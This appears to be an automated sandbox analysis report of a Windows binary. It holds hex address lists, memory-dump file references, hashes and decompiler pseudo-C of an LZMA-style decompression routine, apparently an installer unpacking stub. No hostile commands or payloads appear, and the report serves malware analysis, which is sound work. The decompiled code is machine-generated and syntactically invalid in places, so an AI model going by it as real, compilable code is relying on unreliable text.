0x00405feb
0x00405fed
0x00405fee
0x00405ff1
0x00405ff3
0x00405ff4
0x00405ff6
0x00405ff9
0x00405ffe
0x00406003
0x0040600c
0x0040601f
0x00406022
0x0040602e
0x00406056
0x00406058
0x00406066
0x00406066
0x0040606a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605a
0x0040605a
0x0040605d
0x0040605e
0x0040605e
0x00000000
0x0040605a
0x00406034
0x00406039
0x00406039
0x00406042
0x0040604a
0x0040604d
0x00000000
0x00406053
0x00406053
0x00000000
0x00406053
0x00000000
0x00406070
0x00406070
0x00406074
0x00406920
0x00000000
0x00406920
0x0040607d
0x0040608d
0x00406090
0x00406093
0x00406093
0x00406093
0x00406096
0x0040609a
0x00000000
0x00000000
0x0040609c
0x004060a2
0x004060cc
0x004060d2
0x004060d9
0x00000000
0x004060d9
0x004060a8
0x004060ab
0x004060b0
0x004060b0
0x004060bb
0x004060c3
0x004060c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040610b
0x00406111
0x00406114
0x00406121
0x00406129
0x00000000
0x00000000
0x004060e0
0x004060e0
0x004060e4
0x0040692f
0x00000000
0x0040692f
0x004060f0
0x004060fb
0x004060fb
0x004060fb
0x004060fe
0x00406101
0x00406104
0x00406109
0x00000000
0x00000000
0x00000000
0x00000000
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004067ee
0x004067f2
0x004069a1
0x00000000
0x004069a1
0x004067fe
0x00406805
0x0040680d
0x00406810
0x00406813
0x00406813
0x00000000
0x00000000
0x00406131
0x00406133
0x00406136
0x004061a7
0x004061aa
0x004061ad
0x004061b4
0x004061be
0x00000000
0x004061be
0x00406138
0x0040613c
0x0040613f
0x00406141
0x00406144
0x00406147
0x00406149
0x0040614c
0x0040614e
0x00406153
0x00406156
0x00406159
0x0040615d
0x00406164
0x00406167
0x0040616e
0x00406172
0x0040617a
0x0040617a
0x0040617a
0x00406174
0x00406174
0x00406174
0x00406169
0x00406169
0x00406169
0x0040617e
0x00406181
0x0040619f
0x004061a1
0x00000000
0x00406183
0x00406183
0x00406186
0x00406189
0x0040618c
0x0040618e
0x0040618e
0x0040618e
0x00406191
0x00406194
0x00406196
0x00406197
0x0040619a
0x00000000
0x0040619a
0x00000000
0x004063d0
0x004063d4
0x004063f2
0x004063f5
0x004063fc
0x004063ff
0x00406402
0x00406405
0x00406408
0x0040640b
0x0040640d
0x00406414
0x00406415
0x00406417
0x0040641a
0x0040641d
0x00406420
0x00406420
0x00406425
0x00000000
0x00406425
0x004063d6
0x004063d9
0x004063dc
0x004063e6
0x00000000
0x00000000
0x0040643a
0x0040643e
0x00406461
0x00406464
0x00406467
0x00406471
0x00406440
0x00406440
0x00406443
0x00406446
0x00406449
0x00406456
0x00406459
0x00406459
0x00000000
0x00000000
0x0040647d
0x00406481
0x00000000
0x00000000
0x00406487
0x0040648b
0x00000000
0x00000000
0x00406491
0x00406493
0x00406497
0x00406497
0x0040649a
0x0040649e
0x00000000
0x00000000
0x004064ee
0x004064f2
0x004064f9
0x004064fc
0x004064ff
0x00406509
0x00000000
0x00406509
0x004064f4
0x00000000
0x00000000
0x00406515
0x00406519
0x00406520
0x00406523
0x00406526
0x0040651b
0x0040651b
0x0040651b
0x00406529
0x0040652c
0x0040652f
0x0040652f
0x00406532
0x00406535
0x00406538
0x00406538
0x0040653b
0x00406542
0x00406547
0x00000000
0x00000000
0x004065d5
0x004065d5
0x004065d9
0x00406977
0x00000000
0x00406977
0x004065df
0x004065e2
0x004065e5
0x004065e9
0x004065ec
0x004065f2
0x004065f4
0x004065f4
0x004065f4
0x004065f7
0x004065fa
0x00000000
0x00000000
0x004061ca
0x004061ca
0x004061ce
0x0040693b
0x00000000
0x0040693b
0x004061d4
0x004061d7
0x004061da
0x004061de
0x004061e1
0x004061e7
0x004061e9
0x004061e9
0x004061e9
0x004061ec
0x004061ef
0x004061ef
0x004061f2
0x004061f5
0x00000000
0x00000000
0x004061fb
0x00406201
0x00000000
0x00000000
0x00406207
0x00406207
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x00406218
0x0040621b
0x0040621d
0x00406223
0x00406226
0x00406229
0x0040622c
0x0040622f
0x00406232
0x00406235
0x00406251
0x00406254
0x00406257
0x0040625a
0x00406261
0x00406265
0x00406267
0x0040626b
0x00406237
0x00406237
0x0040623b
0x00406243
0x00406248
0x0040624a
0x0040624c
0x0040624c
0x0040626e
0x00406275
0x00406278
0x00000000
0x0040627e
0x00000000
0x0040627e
0x00000000
0x00406283
0x00406283
0x00406287
0x00406947
0x00000000
0x00406947
0x0040628d
0x00406290
0x00406293
0x00406297
0x0040629a
0x004062a0
0x004062a2
0x004062a2
0x004062a2
0x004062a5
0x004062a8
0x004062a8
0x004062a8
0x004062ae
0x00000000
0x00000000
0x004062b0
0x004062b3
0x004062b6
0x004062b9
0x004062bc
0x004062bf
0x004062c2
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062e6
0x004062e9
0x004062ec
0x004062ef
0x004062ef
0x004062f2
0x004062f6
0x004062f8
0x004062d0
0x004062d0
0x004062d8
0x004062dd
0x004062df
0x004062e1
0x004062e1
0x004062fb
0x00406302
0x00406305
0x00000000
0x00406307
0x00000000
0x00406307
0x00406305
0x0040630c
0x0040630c
0x0040630c
0x0040630c
0x00000000
0x00000000
0x00406347
0x00406347
0x0040634b
0x00406953
0x00000000
0x00406953
0x00406351
0x00406354
0x00406357
0x0040635b
0x0040635e
0x00406364
0x00406366
0x00406366
0x00406366
0x00406369
0x0040636c
0x0040636c
0x00406372
0x00406310
0x00406310
0x00406313
0x00000000
0x00406313
0x00406374
0x00406374
0x00406377
0x0040637a
0x0040637d
0x00406380
0x00406383
0x00406386
0x00406389
0x0040638c
0x0040638f
0x00406392
0x004063aa
0x004063ad
0x004063b0
0x004063b3
0x004063b3
0x004063b6
0x004063ba
0x004063bc
0x00406394
0x00406394
0x0040639c
0x004063a1
0x004063a3
0x004063a5
0x004063a5
0x004063bf
0x004063c6
0x004063c9
0x00000000
0x004063cb
0x00000000
0x004063cb
0x00000000
0x00406658
0x00406658
0x0040665c
0x00406983
0x00000000
0x00406983
0x00406662
0x00406665
0x00406668
0x0040666c
0x0040666f
0x00406675
0x00406677
0x00406677
0x00406677
0x0040667a
0x00000000
0x00000000
0x00406428
0x00406428
0x0040642b
0x0040679d
0x0040679d
0x00000000
0x00000000
0x00000000
0x00000000
0x00406824
0x00406828
0x00406846
0x00406846
0x00406846
0x0040684d
0x00406854
0x00000000
0x00406854
0x0040682a
0x0040682d
0x00406830
0x00406833
0x0040683a
0x00000000
0x00000000
0x00406915
0x00406918
0x00406819
0x00406819
0x00000000
0x00000000
0x0040654f
0x00406551
0x00406558
0x00406559
0x0040655b
0x0040655e
0x00000000
0x00000000
0x00406566
0x00406569
0x0040656c
0x0040656e
0x00406570
0x00406570
0x00406571
0x00406574
0x0040657b
0x0040657e
0x0040658c
0x00000000
0x00000000
0x00000000
0x00000000
0x00406871
0x00406871
0x00406875
0x004069ad
0x00000000
0x004069ad
0x0040687b
0x0040687e
0x00406881
0x00406885
0x00406888
0x0040688e
0x00406890
0x00406890
0x00406890
0x00406893
0x00406896
0x00406896
0x00406896
0x00406896
0x00000000
0x00000000
0x00406594
0x00406597
0x004065cd
0x004066fd
0x004066fd
0x004066fd
0x004066fd
0x00406700
0x00406700
0x00406703
0x00406705
0x0040698f
0x00000000
0x0040698f
0x0040670b
0x0040670e
0x00000000
0x00000000
0x00406714
0x00406718
0x0040671b
0x0040671b
0x0040671b
0x00000000
0x0040671b
0x00406599
0x0040659b
0x0040659d
0x0040659f
0x004065a2
0x004065a3
0x004065a5
0x004065a7
0x004065aa
0x004065ad
0x004065c3
0x004065c8
0x00406600
0x00406600
0x00406604
0x00406630
0x00406632
0x00406639
0x0040663c
0x0040663f
0x0040663f
0x00406644
0x00406644
0x00406646
0x00406649
0x00406650
0x00406653
0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00406316
0x00406316
0x0040631a
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x00000000
0x00000000
0x004064a1
0x004064a1
0x004064a5
0x0040696b
0x00000000
0x0040696b
0x004064ab
0x004064ae
0x004064b1
0x004064b4
0x004064b6
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064d7
0x004064da
0x004064dc
0x004064dc
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x004064df
0x004064df
0x00000000
0x004064df
0x00406760
0x00406995
0x004069b7
0x004069bd
0x004069bf
0x004069c6
0x004069c8
0x004069cf
0x004069d3
0x00000000
0x00405fc4
0x004069cc
0x004069cc
0x00000000
0x004069cc
0x00406819
0x0040689f
0x004068a5
0x004068a8
0x004068ab
0x004068ae
0x004068b1
0x004068b4
0x004068b7
0x004068ba
0x004068c0
0x004068d9
0x004068dc
0x004068df
0x004068e2
0x004068e6
0x004068e8
0x004068e9
0x004068ec
0x004068c2
0x004068c2
0x004068ca
0x004068cf
0x004068d1
0x004068d4
0x004068d4
0x004068f6
0x00000000
0x004068f8
0x00000000
0x004068f8
0x004068f6
0x00000000
0x0040676b

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
Instruction ID: 868f2ec1f3ea74d7de1394d818727f69d5aca31e92bf34b5737afca42cfaef71
Opcode Fuzzy Hash: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
Instruction Fuzzy Hash: 6E913171D00229CBEF28CF98C8547ADBBB1FF44305F15812AD856BB281C7789A9ADF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040647D, Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040647D() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
